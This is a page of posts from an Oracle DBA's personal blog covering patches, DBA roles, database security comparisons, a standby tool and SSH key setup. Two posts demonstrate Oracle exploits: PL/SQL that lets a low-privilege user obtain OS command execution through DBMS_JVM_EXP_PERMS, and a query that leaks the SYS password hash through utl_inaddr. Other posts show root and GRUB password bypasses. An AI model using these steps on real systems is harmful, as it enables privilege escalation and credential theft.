Osama mustafa blog – Page 8

ORA-1461 encountered when generating server alert SMG-3500

Posted on April 16, 2013December 23, 2018 by Osama Mustafa in Database

Two bug could be related to this error Bug 6085625 and unpublished bug 6452485.

to fix the above bug you need to apply Patch 6602742 or Patch 6602482 Depend on your case

as workaround you have to optiosn :

A. Flushing the shared pool can help remove the problem cursor from the shared pool.
B. Or set SESSION_CACHED_CURSORS = 0

Thank you
Osama mustafa

Oracle APPS DBA vs Oracle DBA

Posted on April 15, 2013December 23, 2018 by Osama Mustafa in Others

Name Different In One Thing Apps , Both Are DBA for the same corporation but before going further you need to know what the definition for both of them what APPS DBA mean and What Oracle DBA mean ?

Oracle DBA ( Database Administrator ) is the person who responsible for administration , Monitor , tuning and recover database ( Failure cases ) For Oracle Database this Person Called Oracle DBA.

Lot of Jobs and Tasks for this Person

Installing and upgrading the Oracle server and application tools
Allocating system storage and planning future storage requirements for the database system
Creating primary database storage structures (tablespaces) after application developers have designed an application
Creating primary objects (tables, views, indexes) once application developers have designed an application
Modifying the database structure, as necessary, from information given by application developers
Enrolling users and maintaining system security
Ensuring compliance with your Oracle license agreement
Controlling and monitoring user access to the database
Monitoring and optimizing the performance of the database
Planning for backup and recovery of database information
Maintaining archived data on tape
Backing up and restoring the database
Contacting Oracle Corporation for technical support

For More Information Read oracle Documentation Here.

in he big company that required 24/24hr monitor for more than one database therefore you cannot assign everything to this person he will be killed. So two kind of DBA appeared to reduce Tasks

Development DBA & Production DBA each one of them has it’s own job and Tasks.

Development DBA:

well from the name you can see it’s person who works closely with developers team to make sure database design and performance are working find without any problems.

Production DBA

Person who responsible to ensure that Database for this company is healthy and running without any problem it’s not easy job since this type of Database is the main database for company so you have to ensure it’s working fine or you will be fired.

I mention before of my blog how to become DBA and what you need to do that ? Good understanding of the Oracle database, understanding of the underlying operating system , how Oracle acquires and manages resources, knowledge of both database and system performance tuning,communication skills , management , and ability to handle multiple projects and deadlines all this Hints to become DBA. Read my Post About “how to become DBA” Here

After you have small knowledge about DBA tasks and What he is doing ? Let’s talk about APPS DBA.

Simply the equation :

ORACLE APPS DBA = Application* + Database.

*Which Application is Fusion Middle Ware Products from Oracle.

If you are aware of all the previous tasks then you are able to be Oracle APPS DBA, Oracle APPS DBA include all Oracle DBA tasks and it’s very huge subject to learn and explorer.

So the Task for APPS DBA :

All Oracle DBA tasks.
Patching
Cloning
Maintenance Oracle Application.
Installations Oracle EBS.

So as conclusion Oracle APPS DBA is an Oracle DBA because of this he can switch easliy between this job Role, and don’t let this disappointed you also Oracle DBA can switch to APPS DBA but he must read LOT.

Thank you

Osama Mustafa

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

Posted on April 13, 2013December 23, 2018 by Osama Mustafa in Others

DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield, Also you need to know this way of hacking it’s only works on Windows and Oracle database version infected 10gR2,11gR1 and 11gR2.

The below demonstration explain how to use it :

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT
‘GRANT’,’GREMLIN’,’SYS’,’java.io.FilePermission’,'<FILES>>’,’execute’,’ENABLED’ FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

PL/SQL procedure successfully completed.

SQL> CONNECT / AS SYSDBA
Connected.

SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;

TYPE_NAME NAME ACTION
—————————— —————————— ———-
java.io.FilePermission <> execute

As you see at first User Test Only has Create Session Privileges but after using the above package he now can execute any OS Command using Java Code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this :

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Thank you
Osama Mustafa

Hack Sys Password With Simple Way

Posted on April 12, 2013December 23, 2018 by Osama Mustafa in Others

Sometimes you want to know the SYS password with simplest way, well check the below if you have any User with DBA role then you can do that :

SQL> select utl_inaddr.get_host_name((select username||’=’||password from dba_users where rownum=1)) from dual;

select utl_inaddr.get_host_name((
*
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at “SYS.UTL_INADDR”, line 4
ORA-06512: at “SYS.UTL_INADDR”, line 35
ORA-06512: at line 1

Now You can use any Software or Online Site to Hack This Password

Thank you
Osama Mustafa

Basic Database Securiy GuideLines

Posted on April 8, 2013December 23, 2018 by Osama Mustafa in Others

Implementing any Database Security is not easy process which it’s Complex since the security has to be looked at OS Layer, Database, Network , application code, and backup lot of things you need to check if you need secure database you can’t ignore one part of this components.

You need to know even experts/Guru dose not have complete understanding for this list, maybe they have knowledge about it but not that much, But the most important things in securing database ( new one ) or securing application is early understanding security model very early in the development process and how to develop it. you can read the this book “Oracle security: Step-by-step” by Pete Finnigan he mentioned lot of basic steps to secure oracle database.

From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example if we asked ourself as DBA About SQL injection one of the TOP ten Threats in Database
it happens because somebody is writing a Web application that accesses your database which mean if this code writes incorrectly, what happened if the hacker get access to your database thru this code.because of this DBA needs to understand who is access to database and make sure the developers are accessing in a secure way.

Internal/External hacker going to search for Holes in your application to get in,as we know there’s one of attack type used called Buffer Overflow because of this you need to keep you system is up to date patched like usual people most of them not doing that since they worried about if that patch will broke their system or application.

Today a lot of people are ignoring the security side of the job. Many companies don’t have the resources. Until you get hacked, and until you lose data, then you think you can get by with minimal security.

I mention before the in my article about Basic steps to secure Oracle Database some of this article provided with examples i will advise today to bookmark this to keep updated with Oracle Security patches lot of tips to talk about and need to share it here as soon as i can.

Thank you
Osama Mustafa

Hack Root Password With Protected Grub

Posted on April 6, 2013December 23, 2018 by Osama Mustafa in Operating system

I post before Article talking about “Hack Root Password With Protected Grub” Here .

But what if GRUB was Locked By password and you forget Root Password, There’s always away to do it but you need the same media for Operating system ( Never tried to use different distribution ) after boot :

In the above screen Type ” linux rescue ” and then Press enter

After follow the instruction and Enter Bash

chroot /mnt/sysimage [Enter]
cd /boot/grub [Enter]
vi menu.lst

Now In that file you see word “Password” Remove Line, This will remove Grub password after save it the OS will Reboot but this time Grub will be UN-Protected , Remove CD and follow the normal instruction in Article Number one Here.

Thank you
Osama Mustafa

Reset/Hack Linux Root Password ( Unprocted GRUB )

Posted on April 3, 2013December 23, 2018 by Osama Mustafa in Operating system

Do you want to learn something New ? Hack/Reset Root Linux Password Then Continue Reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What If I Forget Root Password? Check The below

Restart The Server and you must see this screen Pause it click arrow :

Second Press “a” then add “1” like the below screen after finish Press enter :

Now Black Screen :

Print “Runlevel”

and Reset Root Password like the below by type “passwd” command :

Note : This Way works with Redhat , Fedora and CentOs i didn’t try it on Ubuntu

Thank you
Osama mustafa

Oracle Database vs Sql Server Security

Posted on April 2, 2013December 23, 2018 by Osama Mustafa in Others

Which one is the more secure ?

the above question asked before and will be asked today and in the future but what is the answer !! Before start asnwering this question you need to discuss somepoints.

as introduction Sql server is database solution product from Microsoft corporation with the following Version list :

SQL Server 2012
SQL Server 2008 R2
SQL Server 2008
SQL Server 2005
SQL Server 2000
SQL Server 7.0

On the other hand we have oracle Database which RDMS ( Relation Database Managment System ) with the following version list :

Oracle7
Oracle8 Database
Oracle8i Database
Oracle9i Database
Oracle Database 10g
Oracle Database 11g

each of database include new features, this features could be related to high availability, database features and secuirty features, I try to be fair in my judgment, Let’s Back to Question Which is More Secure Oracle Database vs Microsoft Sql Server ? and why ?

I read lot of research regarding to this question and most of them caliming that sql server is more secure than Oracle database but why ? oracle is the best database for large organization and can store more date with a great security when i mean great Security there’s lot of solution products from Oracle such as Database vault , Audit Vault , and Data masking. But for small solutions and Orginization most of them use Sql server .

I red this Reports for David Litchfield here. and published in November 2006 and calims hat sql server is more secure than oracle database. also you need to know while you are compare this two database the main difference between them :

Microsoft Sql server is only working on One Platform ( Windows ), easy to manage, Most of the administration thru GUI (very friendly ) , simple to install , Sql server is cost less than oracle ( Cost much more than less ) Licensing fees. all this indicate me to the following :

since sql server is easy to install and administration then the performance is usually fine.
The only way to scale a system built on sql server technology is to add more memory and CPU to the single server hosting the database.
as mention before Sql server Suport Only One Platform.

On the other hand Oracle is Support all plaforms ( Linux , Unix , Windows , HP , AIX and Sun .. and sorry i forgot to mention others ), i will not say it’s easy to install but document are available for free if you follow them you will not be lost, Oracle database is enterprise solutions which mean if you need database that store huge data and support high availability cluster ( sql server dose not support it ) and introduce lot of backup recovery solution, data guard on of them becuase of this it’s expensive and costing the company don’t forget the main reason Oracle DBA salary is more than Sql server which mean the compaines will study this case before looking for solutions.

also to be fair Oracle support talking some time to answering you and solve the issue or database vulnerability , however in sql server support it’s amazing and solve the issue or vulnerability database in 24 hours or less.

since oracle database working for large organization business such as finical and insurance company the aim for any hackers ( i would like to mention here hacker not looking for small company to hack it’s need something will be worth if he getting caught ) it will make it under attack for any hacker in my articles i mentioned there’s no secure system 100% but you can make it harder for any hacker to access to your data and oracle provide with products to do that : Data Valut , Audit Vault , Database firewall and encryption.

Another point i would like to mention here ( take it also as point when you compare ) oracle working on more than platforms.so Focusing on one platform Security will be the same as five/six/… platforms Security ? you should answer on this question not me !!!

Oracle’s capacity to run on large databases, its have many performance improvement features,the performance can include Hardware or database ( sql server only hardware ) which is more secure ?

it’s completely up to you but don’t miss or ignore the point i mentioned before in this article

Thank you
Osama Mustafa

First Look : Dbvisit Standby

Posted on March 29, 2013December 23, 2018 by Osama Mustafa in Others

Dbvisit Standby it’s tool for creating standby database to ensure high availability for Oracle Database, It’s similar for Data Guard but The main differnce i notice in Data Guard you need to have EE ( Oracle Database Enterprise Editions ) But not any more with DbVisit You can Create your Standby Even With SE ( Oracle Database Standard Editions ).

In Last Three days i was testing this Product , and all i can say it’s amazing and easy to use , steps are clear and even when code/Error return the description is so clear, also with Dbvisit You can Have Two way to create Standby : Command line and GUI both are easy and all you have to do is following the steps in the document.

what i notice too support for this product is amazing, Sine i download trail version i revived an email telling me if i need anything all i have to do is sent an email with error code and dbVisit Support team will answering me, Couple of days later they send me another email asking me for my feedback and I am writing this article to ensure my view point is clear, I checked DbVisit Forum and answers was within 1-3 Working days which indicate they have very active supporting team to improve this product.

The Below Figure describe Dbvisit Standby architecture :

There’s no need to mention Creation steps since everything already included in documents but the below will find some screen shot for the installation , Most of the steps done on Primary Database all you have to do on standby 3 steps as i remember :

On Primary Database :

Standby Screen Shot :

Thank you
Osama Mustafa

The Fastest Way to Create SSH between Servers

Posted on March 28, 2013December 23, 2018 by Osama Mustafa in Operating system

In this short Topic i will provide the 3 steps to create SSH ( User Equivalence ) Without Password you can find lot of way but it’s just simple way and don’t need much steps to create SSH between server.

Introduction for SSH, “Ssh is a secure remote login program that is similar to rlogin and rsh. The major difference between ssh and other remote login programs is that ssh encrypts the password and other information so that it can’t be “sniffed” by others as you type it. Ssh also sets up X11 connections, so the DISPLAY variable does not have to be set on remote machines. Scp is another program used to securely copy files from one host to another.”

Example To Use SSH in Oracle : Real Application Cluster ( RAC ).

The Steps :

#1:

Create New SSH Key

oracle@PrimNode$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/oracle/.ssh/id_rsa):[Enter key]
Enter passphrase (empty for no passphrase): [Press enter key]
Enter same passphrase again: [Pess enter key]
Your identification has been saved in /home/oracle/.ssh/id_rsa.
Your public key has been saved in /home/oracle/.ssh/id_rsa.pub.
The key fingerprint is:
33:b3:fe:af:95:95:18:11:31:d5:de:96:2f:f2:35:f9

#2:

This Step will Just copy the password File Generated in Step 1 to Server 2.

oracle@PrimNode$ ssh-copy-id -i ~/.ssh/id_rsa.pub You need to use ip/hostname to another server.
oracle@Server2 password:
Now try logging into the machine, with “ssh ‘remote-host'”, and check in:
.ssh/authorized_keys
to make sure we haven’t added extra keys that you weren’t expecting.

#3:

Just Check

oracle@PrimNode$ ssh Server2
Last login: Thu Mar 28 01:54:21 2013 from primora10g
[Test it no password]
oracle@Server2$

Thank you
Osama Mustafa